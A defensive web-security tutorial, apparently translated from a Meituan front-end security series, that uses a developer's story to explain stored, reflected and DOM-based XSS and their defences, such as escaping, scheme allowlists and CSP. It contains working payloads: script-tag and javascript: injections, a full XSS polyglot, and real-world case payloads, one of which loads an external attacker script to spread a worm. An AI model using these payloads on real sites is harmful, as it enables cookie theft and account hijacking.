Case
One day, the company needed a search page that displays the search keyword taken from a URL parameter. Xiao Ming quickly wrote the page and put it online. The code was as follows:
<input type="text" value="<%= getParameter("keyword") %>">
<button>Search</button>
<div>
  The keyword you searched for is: <%= getParameter("keyword") %>
</div>
When the browser requests http://xxx/search?keyword="><script>alert('XSS');</script>, the server parses the request parameter keyword, gets "><script>alert('XSS');</script>, splices it into the HTML, and returns it to the browser. The resulting HTML is:
<input type="text" value=""><script>alert('XSS');</script>">
<button>Search</button>
<div>
  The keyword you searched for is: "><script>alert('XSS');</script>
</div>
The browser cannot tell that <script>alert('XSS');</script> is malicious code, so it executes it.
Not only is the content of the div injected, but so is the value attribute of the input, so the alert pops up twice.
In the face of this situation, how should we take precautions?
In fact, the browser is simply treating the user's input as a script and executing it. We just need to tell the browser that this content is text.
Clever Xiao Ming quickly found a fix:
<input type="text" value="<%= escapeHTML(getParameter("keyword")) %>">
<button>Search</button>
<div>
  The keyword you searched for is: <%= escapeHTML(getParameter("keyword")) %>
</div>
escapeHTML() escapes characters according to the following rules:
| Character | Escaped character |
| - | - |
| & | &amp; |
| < | &lt; |
| > | &gt; |
| " | &quot; |
| ' | &#x27; |
| / | &#x2F; |
After the escape function is applied, the browser receives the following response:
<input type="text" value="&quot;&gt;&lt;script&gt;alert(&#x27;XSS&#x27;);&lt;&#x2F;script&gt;">
<button>Search</button>
<div>
  The keyword you searched for is: &quot;&gt;&lt;script&gt;alert(&#x27;XSS&#x27;);&lt;&#x2F;script&gt;
</div>
The malicious code is escaped, no longer executed by the browser, and the search term appears perfectly on the page.
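The article does not show the body of escapeHTML(), so the following is only a minimal sketch of what such a function might look like, assuming it implements exactly the six escape rules listed above. The name HTML_ESCAPES is made up for illustration; in production a mature escape library is the safer choice.

```javascript
// Hypothetical lookup table (not from the article): each special character
// mapped to its HTML entity, following the escape rules listed above.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#x27;",
  "/": "&#x2F;",
};

function escapeHTML(input) {
  // A single pass over the string, so an "&" produced by one replacement
  // is never escaped a second time.
  return String(input).replace(/[&<>"'/]/g, (ch) => HTML_ESCAPES[ch]);
}

const keyword = `"><script>alert('XSS');</script>`;
console.log(escapeHTML(keyword));
// &quot;&gt;&lt;script&gt;alert(&#x27;XSS&#x27;);&lt;&#x2F;script&gt;
```

Doing all replacements in one regular-expression pass avoids the classic bug of chained replace() calls, where escaping & after < would turn &lt; into &amp;lt;.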
Through this incident, Xiao Ming learned the following:
- Typically, a page places user input in a fixed container or attribute and presents it as text.
- Attackers use the user input on these pages to concatenate specially formatted strings that break out of the original position and form code fragments.
- Attackers inject scripts into the target website and make them run in users' browsers, which creates potential risks.
- XSS attacks can be prevented by HTML escaping.
Of course, it is not that simple! Keep reading.
Watch out for special HTML attributes and JavaScript APIs
Since the last incident, Xiao Ming has been careful to escape data inserted into the page. He also discovered that most template engines come with an escape configuration, so that all data inserted into the page is escaped by default. With this in place, he no longer worried about accidentally leaving a variable unescaped, and his work gradually became easier.
However, as the director of this story, I could not let Xiao Ming fix bugs so easily and happily.
Before long, Xiao Ming received a mysterious link from the security team: http://xxx/?redirect_to=javascript:alert('XSS'). Not daring to be careless, Xiao Ming quickly opened the page. However, the page did not automatically pop up the dreaded "XSS".
Xiao Ming opened the source code of the corresponding page and found the following:
<a href="<%= escapeHTML(getParameter("redirect_to")) %>">Jump...</a>
When the attack URL is http://xxx/?redirect_to=javascript:alert('XSS'), the server responds with:
<a href="javascript:alert(&#x27;XSS&#x27;)">Jump...</a>
The code does not execute immediately, but once the user clicks the <a> tag, the browser decodes the entities in the attribute value, runs the script, and pops up "XSS".
In this case, the user's data does not break out of its position; it is still a well-formed href attribute. But its content is not the kind we expected.
It turns out that not only special characters but also strings such as javascript: can trigger XSS attacks when they appear in certain positions.
Xiao Ming frowned and thought of a solution:
// Disallow URLs that start with "javascript:"
xss = getParameter("redirect_to").startsWith('javascript:');
if (!xss) {
  <a href="<%= escapeHTML(getParameter("redirect_to")) %>">Jump...</a>
} else {
  <a href="/404">Jump...</a>
}
As long as the URL does not start with javascript:, is it safe?
The security team dropped another link: http://xxx/?redirect_to=jAvascRipt:alert('XSS')
Can this really execute? ... Well, browsers are just that forgiving: the scheme of a URL is case-insensitive.
Xiao Ming was close to tears. When checking whether the URL starts with javascript:, he now converted the user's input to lowercase before comparing.
However, as the saying goes, "While the priest climbs a post, the devil climbs ten." Faced with Xiao Ming's defenses, the security team constructed a link like this:
http://xxx/?redirect_to=%20javascript:alert('XSS')
After URL decoding, %20javascript:alert('XSS') becomes " javascript:alert('XSS')", a string that begins with a space. In this way, the attacker bypasses the back end's keyword rule and completes the injection.
Finally, Xiao Ming switched to an allowlist (whitelist) and fixed the vulnerability for good:
// Filter according to the project's needs: block "javascript:" links, illegal schemes, and so on
allowSchemes = ["http", "https"];
valid = isValid(getParameter("redirect_to"), allowSchemes);
if (valid) {
  <a href="<%= escapeHTML(getParameter("redirect_to")) %>">Jump...</a>
} else {
  <a href="/404">Jump...</a>
}
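The article only names isValid() and does not show its body. One possible way to sketch it, assuming a JavaScript runtime with the standard WHATWG URL class (browsers and Node.js), is to let the URL parser normalize the input and then compare the parsed scheme against the allowlist. The placeholder base URL https://example.invalid/ is an assumption added so that relative links still parse.

```javascript
// Hypothetical isValid(): the article only names this helper, so this is one
// possible implementation built on the standard WHATWG URL class.
function isValid(rawUrl, allowSchemes) {
  let parsed;
  try {
    // Placeholder base (an assumption) so relative links such as "/404" parse.
    parsed = new URL(rawUrl, "https://example.invalid/");
  } catch {
    return false; // unparseable input is rejected
  }
  // The parser strips leading whitespace and lowercases the scheme;
  // protocol always ends with ":", which is dropped before comparing.
  const scheme = parsed.protocol.slice(0, -1);
  return allowSchemes.includes(scheme);
}

const allowSchemes = ["http", "https"];
console.log(isValid("https://example.com/page", allowSchemes)); // true
console.log(isValid("jAvascRipt:alert('XSS')", allowSchemes));  // false
console.log(isValid(" javascript:alert('XSS')", allowSchemes)); // false
```

Checking the parsed scheme rather than the raw string prefix is what defeats the mixed-case and leading-space tricks from the story. Note that this sketch only validates the scheme; it does not restrict which hosts a redirect may point to.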
Through this incident, Xiao Ming learned the following:
- Escaping HTML does not by itself guarantee safety.
- For link jumps such as <a href="xxx"> or location.href="xxx", validate the content and forbid links that start with javascript: as well as other illegal schemes.
Use different escape rules depending on the context
One day, to speed up page loading, Xiao Ming inlined a piece of data into the HTML as JSON:
<script>
var initData = <%= data.toJSON() %>
</script>
escapeHTML() cannot be used where JSON is inserted, because escaping " would break the JSON format.
However, the security team found that inlining JSON this way is not safe either:
- If the JSON contains the characters U+2028 or U+2029, JavaScript engines that predate ES2019 do not accept them inside string literals and throw a syntax error.
- If the JSON contains the string </script>, the current script tag is closed and the string content after it is parsed by the browser as HTML; the attacker can then complete the injection by adding another <script> tag.
So the inlined JSON needs its own escape function, escapeEmbedJSON(). The escape rules are as follows:
| Character | Escaped character |
| - | - |
| U+2028 | \u2028 |
| U+2029 | \u2029 |
| < | \u003c |
The fixed code looks like this:
<script>
var initData = <%= escapeEmbedJSON(data.toJSON()) %>
</script>
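The article gives the escape rules for escapeEmbedJSON() but not its body. A minimal sketch, assuming the function receives an already serialized JSON string, could look like this. It is illustrative only; a well-tested serialization library is preferable in production.

```javascript
// Hypothetical escapeEmbedJSON(): expects an already serialized JSON string
// and applies the three escape rules from the table above.
function escapeEmbedJSON(json) {
  return json
    .replace(/\u2028/g, "\\u2028") // line separator
    .replace(/\u2029/g, "\\u2029") // paragraph separator
    .replace(/</g, "\\u003c");     // keeps "</script>" from closing the tag
}

const data = { comment: "</script><script>alert('XSS')</script>" };
const embedded = escapeEmbedJSON(JSON.stringify(data));
console.log(embedded);
```

In valid JSON these three characters can only occur inside string values, where \uXXXX escapes are legal, so JSON.parse(embedded) still returns the original data.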
Through this incident, Xiao Ming learned the following:
- HTML escaping is very complex and requires different escape rules in different contexts. Using the wrong escape rules is likely to leave an XSS hole.
- Avoid writing your own escape library; use a mature, widely adopted one instead.
Vulnerability summary
That concludes Xiao Ming's examples. Let's look systematically at the ways XSS can be injected:
- In text embedded in HTML, malicious content is injected as script tags.
- In inline JavaScript, concatenated data breaks through the original constraints (strings, variables, method names, etc.).
- In tag attributes, malicious content includes quotes to override attribute values and inject other attributes or tags.
- In the href, src, and other attributes of a tag, the content contains executable code such as javascript:.
- In event attributes such as onload, onerror, and onclick, uncontrolled code is injected.
- In the style attribute and tag, the content contains code such as background-image:url("javascript:..."); (newer browsers already defend against this).
- In the style attribute and tag, the content contains CSS expression code such as expression(...) (newer browsers already defend against this).
In short, if a developer inserts user-supplied text into HTML without filtering it properly, an injection vulnerability can easily result. Attackers can exploit the vulnerability to construct malicious code and use it to compromise data security.
What is XSS
Cross-Site Scripting (XSS) is a code injection attack. The attacker injects malicious scripts into the target website so that they run in the user's browser. With these scripts, attackers can obtain sensitive user information such as cookies and session IDs, thereby compromising data security.
The natural abbreviation would be CSS; to distinguish it from Cascading Style Sheets, the first letter was changed to X, hence XSS.
The essence of XSS is that malicious code is not filtered and gets mixed in with the site's normal code; the browser cannot tell which scripts are trusted, so the malicious script is executed.
Because it runs directly on the user's device, malicious code can read the user's information directly, or use that information to impersonate the user and send attacker-defined requests to the website.
In some cases, input restrictions force the injected script to be short. However, more complex attacks can still be carried out by loading an external script and having the browser execute it.
Here is a question: how do users "inject" malicious scripts?
Not only user-generated content (UGC) in the business can carry an injection; URL parameters can also be a source of attack. None of the following input can be trusted:
- UGC information from the user
- Links from third parties
- URL parameters
- POST parameters
- Referer (possibly from an untrusted source)
- Cookies (possibly injected from other subdomains)
XSS classification
Stored XSS
Stored XSS attack steps:
- The attacker submits malicious code to the database of the target website.
- When the user opens the target website, the website server takes the malicious code out of the database, splices it into HTML and returns it to the browser.
- When the user’s browser receives the response, it parses it and executes the malicious code mixed in.
- Malicious code steals user data and sends it to the attacker’s website, or impersonates the user’s behavior and calls the target website interface to perform the operations specified by the attacker.
This kind of attack is common in website functions with user-saved data, such as forum posts, product reviews, and user messages.
Reflected XSS
Reflected XSS attack steps:
- The attacker constructs a special URL that contains malicious code.
- When a user opens a URL with malicious code, the web server takes the malicious code out of the URL, splices it into HTML and returns it to the browser.
- When the user’s browser receives the response, it parses it and executes the malicious code mixed in.
- Malicious code steals user data and sends it to the attacker’s website, or impersonates the user’s behavior and calls the target website interface to perform the operations specified by the attacker.
The difference between reflected XSS and stored XSS is that the malicious code of stored XSS lives in the database, while the malicious code of reflected XSS lives in the URL.
Reflected XSS vulnerabilities are common in features that pass parameters through URLs, such as site search and redirects.
Because the user must actively open the malicious URL for the attack to take effect, attackers often combine various means to lure users into clicking.
Reflected XSS can also be triggered through POST content, but the trigger conditions are more demanding (the attacker must build a form submission page and lure the user into clicking), so it is very rare.
DOM-based XSS
DOM-based XSS attack steps:
- The attacker constructs a special URL that contains malicious code.
- The user opens a URL with malicious code.
- When the user’s browser receives the response, it parses it and executes it. The front-end JavaScript picks up the malicious code in the URL and executes it.
- Malicious code steals user data and sends it to the attacker’s website, or impersonates the user’s behavior and calls the target website interface to perform the operations specified by the attacker.
DOM-based XSS differs from the previous two types: in a DOM-based attack, the malicious code is extracted and executed entirely on the browser side, so it is a security vulnerability of the front-end JavaScript itself, whereas the other two types are server-side vulnerabilities.
XSS attack prevention
As the previous sections show, an XSS attack has two key elements:
- The attacker submits malicious code.
- The browser executes the malicious code.
For the first element: can we filter out malicious code at the moment the user inputs it?
Input filtering
Suppose the front end filters the input when the user submits it and then sends it to the back end. Is this feasible?
The answer is no. Once the attacker bypasses the front-end filter and constructs the request directly, the malicious code can be submitted.
So change the timing of the filter: the back end filters the input before writing it to the database and then returns the "safe" content to the front end. Is this feasible?
For example, a normal user enters 5 < 7, which is escaped to 5 &lt; 7 before it is written to the database.
The problem is that at submission time we do not know where the content will be output.
"Not knowing where it will be output" has two meanings:
- The user's input may be served to both the web front end and a native client; once it has passed through escapeHTML(), the client displays garbled text (5 &lt; 7).
- Within the front end, different positions require different encodings.
When 5 &lt; 7 is spliced into an HTML page, it displays normally as 5 < 7. In other positions, for example when the value is returned through Ajax and assigned to a JavaScript variable, the front end receives the escaped string as is.
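The garbling problem described above can be reproduced in a few lines. This is only an illustrative sketch: escapeHTML() here is a hypothetical stand-in for whatever escape function the back end applies at submission time.

```javascript
// Hypothetical stand-in for the back end's escape function.
const ENTITY_MAP = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "/": "&#x2F;" };
function escapeHTML(input) {
  return String(input).replace(/[&<>"'/]/g, (ch) => ENTITY_MAP[ch]);
}

// Escaping at submission time: the stored value is already HTML-encoded.
const userInput = "5 < 7";
const stored = escapeHTML(userInput);

console.log(stored);           // 5 &lt; 7
console.log(userInput.length); // 5
console.log(stored.length);    // 8
```

A consumer that does not render HTML, such as a native client or a length check in JavaScript, sees the eight-character encoded string rather than what the user typed, which is why escaping belongs at output time.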
Of course, input filtering is still necessary for explicit input types such as numbers, URLs, phone numbers, and email addresses.
Since input filtering is not entirely reliable, we protect against XSS by preventing the browser from executing malicious code. This part falls into two categories:
- Prevent injection in HTML.
- Prevent malicious code from being executed when JavaScript runs.
Preventing stored and reflected XSS attacks
Both stored and reflected XSS arise when the server takes the malicious code and inserts it into the response HTML: the attacker's deliberately crafted "data" is embedded in the "code" and executed by the browser.
There are two common approaches to prevent these vulnerabilities:
- Change to pure front-end rendering, separating code from data.
- Fully escape HTML.
Pure front-end rendering
The process of pure front-end rendering:
- The browser first loads a static HTML page that contains no business data.
- The browser then executes the JavaScript in that HTML.
- The JavaScript loads the business data through Ajax and calls the DOM API to update the page.
In pure front-end rendering, we explicitly tell the browser whether what follows is text (.innerText), an attribute (.setAttribute), a style (.style), and so on. The browser cannot easily be tricked into executing unexpected code.
However, pure front-end rendering still needs to avoid DOM-based XSS vulnerabilities (such as onload events and javascript:xxx in href; see the section "Preventing DOM-based XSS attacks" below).
In many internal and management systems, pure front-end rendering is perfectly appropriate. However, for pages with high performance requirements or SEO requirements, we still face the problem of concatenated HTML.
Escaping HTML
If concatenating HTML is necessary, use a suitable escape library to fully escape every insertion point of the HTML template.
Common template engines such as doT.js, EJS, and FreeMarker usually have only one HTML escaping rule, which escapes the characters & < > " ' /. This does provide some XSS protection, but it is not complete:
| XSS vulnerability | Does simple escaping protect? |
| - | - |
| HTML tag text content | Yes |
| HTML attribute value | Yes |
| CSS inline style | No |
| Inline JavaScript | No |
| Inline JSON | No |
| Jump link | No |
So to improve XSS safeguards, we need to use more sophisticated escape strategies.
Preventing DOM-based XSS attacks
A DOM-based XSS attack occurs because the site's front-end JavaScript is not strict enough and executes untrusted data as code.
Be especially careful when using .innerHTML, .outerHTML, and document.write(). Do not insert untrusted data into the page as HTML; use .textContent, .setAttribute(), and the like instead.
If you use the Vue/React stack and do not use v-html/dangerouslySetInnerHTML, the front-end render stage avoids the XSS risks of innerHTML and outerHTML.
Inline event listeners in the DOM (such as location, onclick, onerror, onload, onmouseover), the href attribute of the <a> tag, and JavaScript's eval(), setTimeout(), setInterval(), and similar functions can all run strings as code. If untrusted data is concatenated into strings and passed to these APIs, a security risk easily results; be sure to avoid it.
<!-- Inline event listeners containing malicious code -->
<img onclick="UNTRUSTED" onerror="UNTRUSTED" src="data:image/png,">
<!-- Link containing malicious code -->
<a href="UNTRUSTED">1</a>
<script>
// Malicious code called in setTimeout()/setInterval()
setTimeout("UNTRUSTED")
setInterval("UNTRUSTED")
// Malicious code called through location
location.href = 'UNTRUSTED'
// Malicious code called in eval()
eval("UNTRUSTED")
</script>
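As a contrast to the dangerous patterns above, the following sketch shows one way untrusted data might be written into the DOM as data rather than code. The helper name renderLink and its parameters are hypothetical; in a browser, baseUrl would typically be document.baseURI.

```javascript
// Hypothetical helper: `anchor` is an <a> element (or any object exposing
// textContent and setAttribute); `baseUrl` would be document.baseURI.
function renderLink(anchor, untrustedText, untrustedUrl, baseUrl) {
  // textContent inserts plain text; the value is never parsed as HTML.
  anchor.textContent = untrustedText;

  let href = "/404"; // fallback, mirroring the redirect example earlier
  try {
    const parsed = new URL(untrustedUrl, baseUrl);
    // Only http(s) links are allowed; javascript: and others are dropped.
    if (parsed.protocol === "http:" || parsed.protocol === "https:") {
      href = parsed.href;
    }
  } catch {
    // Unparseable URL: keep the fallback.
  }
  anchor.setAttribute("href", href);
}
```

The same idea applies to timers and events: pass a function to setTimeout() or addEventListener() instead of a string, so that untrusted values are only ever handled as data.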
Other XSS precautions
While careful escaping can prevent XSS from occurring when rendering pages and executing JavaScript, it is not enough to rely solely on development caution. Here are some common solutions to reduce the risks and consequences of XSS.
Content Security Policy
Strict CSP can play the following roles in XSS prevention:
- Forbid loading scripts from external domains, which prevents complex attack logic.
- Forbid submissions to external domains, so that user data is not leaked to external domains after the site is attacked.
- Forbid inline script execution (a strict rule; GitHub has been observed to use it).
- Forbid unauthorized script execution (a newer feature; Google Maps mobile uses it).
- Use reporting properly to discover XSS promptly, which helps fix problems as soon as possible.
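To make the list above more concrete, here is a sketch of how a strict policy might be assembled as a Content-Security-Policy header value. The helper name buildCsp and the /csp-report endpoint are assumptions for illustration; the directives themselves (default-src, script-src, form-action, report-uri) are standard CSP directives.

```javascript
// Hypothetical helper that assembles a Content-Security-Policy header value.
// `nonce` must be a fresh, unpredictable value generated for every response.
function buildCsp(nonce) {
  return [
    "default-src 'self'",                 // no resources from external domains
    `script-src 'self' 'nonce-${nonce}'`, // no inline scripts unless they carry the nonce
    "form-action 'self'",                 // forms cannot submit to external domains
    "report-uri /csp-report",             // violations are reported (endpoint is an assumption)
  ].join("; ");
}

console.log(buildCsp("abc123"));
```

The server would send the result in the Content-Security-Policy response header and put the same nonce on each script tag it trusts.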
Input length control
Untrusted input should be limited to a reasonable length. While you can’t completely prevent XSS from happening, you can make XSS attacks more difficult.
Other security measures
- HttpOnly cookies: forbid JavaScript from reading certain sensitive cookies, so attackers cannot steal them after an XSS injection.
- CAPTCHA: prevents scripts from impersonating the user to submit dangerous operations.
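As a small illustration of the cookie measure, the sketch below builds a Set-Cookie header value with the HttpOnly attribute. The helper name sessionCookie is hypothetical, and the Secure and SameSite attributes are extra hardening assumed here, not something the article prescribes.

```javascript
// Hypothetical helper that builds a Set-Cookie header value.
function sessionCookie(name, value) {
  // HttpOnly hides the cookie from document.cookie, so injected scripts
  // cannot read it. Secure and SameSite are additional assumptions.
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

console.log(sessionCookie("sid", "a b"));
// sid=a%20b; Path=/; HttpOnly; Secure; SameSite=Lax
```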
XSS detection
Xiao Ming gained a lot from the experience above. He learned how to prevent and fix XSS vulnerabilities and built up security awareness in his daily development. But how can XSS vulnerabilities be detected in code that is already live?
After some searching, Xiao Ming found two methods:
1. Manually detect XSS vulnerabilities using a generic XSS attack string.
2. Use a scanning tool to detect XSS vulnerabilities automatically.
In the article Unleashing an Ultimate XSS Polyglot, Xiao Ming found this string:
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
It can detect XSS vulnerabilities in many contexts, including HTML attributes, HTML text content, HTML comments, jump links, inline JavaScript strings, and inline CSS stylesheets. It can also detect DOM-based XSS vulnerabilities involving eval(), setTimeout(), setInterval(), Function(), innerHTML, and document.write(), and it can bypass some XSS filters.
Xiao Ming only needs to submit this string in each input field of the website, or append it to URL parameters, to run the detection.
Besides manual detection, automated scanning tools such as Arachni, Mozilla HTTP Observatory, and w3af can also be used to find XSS vulnerabilities.
Summary of XSS attacks
Consider two common statements about XSS defense and whether they hold:
- XSS defense is the responsibility of back-end engineers (RD). The back-end RD should escape sensitive characters on every interface where users submit data before processing it further.
This is not correct, because:
  - Guarding against stored and reflected XSS is the responsibility of the back-end RD, but DOM-based XSS does not occur in the back end and is the responsibility of the front-end RD. XSS prevention is a systematic effort that involves both.
  - Escaping should happen when the HTML is output, not when user input is submitted.
- All data to be inserted into the page should pass through one sensitive-character filtering function; once common sensitive characters are filtered out, the data can be inserted into the page.
This is not correct either. Different contexts, such as HTML attributes, HTML text content, HTML comments, jump links, inline JavaScript strings, and inline CSS stylesheets, require different escape rules. Business RD need to choose a suitable escape library and apply different escape rules for different contexts.
Overall, XSS defense is complex and tedious. We not only need to escape data everywhere it must be escaped, but also need to prevent redundant and incorrect escaping so that normal user input is not garbled.
Although it is difficult to avoid XSS completely by technical means, the following principles reduce vulnerabilities:
- Use a template engine and enable its HTML escaping. For example, in EJS, prefer <%= data %> over <%- data %>; in doT.js, prefer {{! data }} over {{= data }}; in FreeMarker, make sure the engine version is above 2.3.24 and choose the correct freemarker.core.OutputFormat.
- Avoid inline events. Avoid concatenating inline event handlers such as onLoad="onload('{{data}}')" or onClick="go('{{action}}')". Binding in JavaScript with .addEventListener() is safer.
- Avoid concatenating HTML. Concatenating HTML on the front end is dangerous. If the framework allows it, use createElement, setAttribute, and similar methods, or adopt a mature rendering framework such as Vue or React.
- Stay alert at all times when inserting DOM attributes, links, and the like.
- Increase attack difficulty and reduce attack consequences by using CSP, input length limits, interface security measures, and similar methods.
- Detect proactively: use XSS attack strings and automated scanning tools to look for potential XSS vulnerabilities.
XSS attack cases
1. Reflected XSS vulnerability on the QQ Mail domain m.exmail.qq.com
The attacker found that at m.exmail.qq.com/cgi-bin/log… the URL parameters uin and domain were output directly into the HTML without being escaped.
The attacker constructed a URL and lured users into clicking it: m.exmail.qq.com/cgi-bin/log…
When a user clicks this URL, the server takes the URL parameters and concatenates them into the HTML response:
<script>
getTop().location.href="/cgi-bin/loginpage?autologin=n&errtype=1&verify=&clientuin=aaa"+"&t="+"&d=bbbb";return false;</script><script>alert(document.cookie)</script>"+"...
When the browser receives the response, it executes alert(document.cookie). In the same way, the attacker can use JavaScript to steal the current user's cookies under the QQ Mail domain, compromising data security.
2. Reflected XSS vulnerability in the Sina Weibo Hall of Fame
The attacker found that at weibo.com/pub/star/g/… the content of the URL was output directly into the HTML without filtering.
The attacker then constructed a URL and lured users into clicking it:
weibo.com/pub/star/g/…"><script src=//xxxx.cn/image/t.js></script>
When a user clicks this URL, the server takes the request URL and concatenates it into the HTML response:
<li><a href="http://weibo.com/pub/star/g/xyyyd"><script src=//xxxx.cn/image/t.js></script>">
When the browser receives the response, it loads and executes the malicious script //xxxx.cn/image/t.js. The malicious script uses the victim's logged-in state to follow accounts, post, and send private messages. The posts and private messages can carry the attack URL, luring more people to click and steadily widening the attack. Such an attack, which spreads malicious content under the victim's identity, is called an XSS worm.
Further reading: Automatic Context-Aware Escaping
As mentioned above:
- Proper HTML escaping effectively helps avoid XSS vulnerabilities.
- A complete escape library needs multiple rules for different contexts, such as HTML attributes, HTML text content, HTML comments, jump links, inline JavaScript strings, and inline CSS stylesheets.
- Business RD need to choose the escape rule that matches the context of each insertion point.
Escape libraries are generally not context-aware, so the responsibility for applying the right escape rule falls on the business RD: each one must fully understand the various forms of XSS and make sure every insertion point uses the correct rule.
This mechanism is labor-intensive and relies on manual care, so XSS vulnerabilities slip in easily and security staff have a hard time finding them.
In 2009, Google introduced a concept called Automatic Context-Aware Escaping.
Context-aware means that when the template engine parses the template string, it parses the template syntax, analyzes the context of each insertion point, and automatically selects the escape rule accordingly. This reduces the workload of the business RD and reduces human omissions.
In a template engine that supports Automatic Context-Aware Escaping, business RD can define templates like this without applying escape rules by hand:
<html>
<head>
<meta charset="UTF-8">
<title>{{.title}}</title>
</head>
<body>
<a href="{{.url}}">{{.content}}</a>
</body>
</html>
After parsing, the template engine knows the context of the three insertion points and automatically selects the corresponding escape rules:
<html>
<head>
<meta charset="UTF-8">
<title>{{.title | htmlescaper}}</title>
</head>
<body>
<a href="{{.url | urlescaper | attrescaper}}">{{.content | htmlescaper}}</a>
</body>
</html>
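To illustrate what the rewritten template does at render time, the following hand-written sketch applies the same three pipelines manually. It is not how any particular engine is implemented: htmlEscaper, attrEscaper, and urlEscaper are simplified, hypothetical stand-ins, and the "#blocked" placeholder is an assumption.

```javascript
// Simplified, hypothetical escapers named after the pipeline stages above.
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "/": "&#x2F;" };
const htmlEscaper = (s) => String(s).replace(/[&<>"'/]/g, (c) => ENTITIES[c]);
const attrEscaper = htmlEscaper; // assumption: quoted attributes reuse entity escaping

function urlEscaper(raw) {
  try {
    // Placeholder base (an assumption) so that relative URLs still parse.
    const parsed = new URL(raw, "https://example.invalid/");
    if (parsed.protocol === "http:" || parsed.protocol === "https:") {
      return String(raw).trim();
    }
  } catch {
    // fall through to the placeholder below
  }
  return "#blocked"; // unsafe or unparseable URLs are replaced
}

// Each insertion point gets the escaper that matches its context.
function render({ title, url, content }) {
  return [
    `<title>${htmlEscaper(title)}</title>`,
    `<a href="${attrEscaper(urlEscaper(url))}">${htmlEscaper(content)}</a>`,
  ].join("\n");
}

console.log(render({ title: "<b>", url: "javascript:alert(1)", content: "a & b" }));
```

A context-aware engine derives these pipelines from the template itself, so the template author never has to pick an escaper by hand.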
Template engines that currently support Automatic Context-Aware Escaping include:
- Go html/template
- Google Closure Templates
reference
Meituan Technical Team - Front-end safety series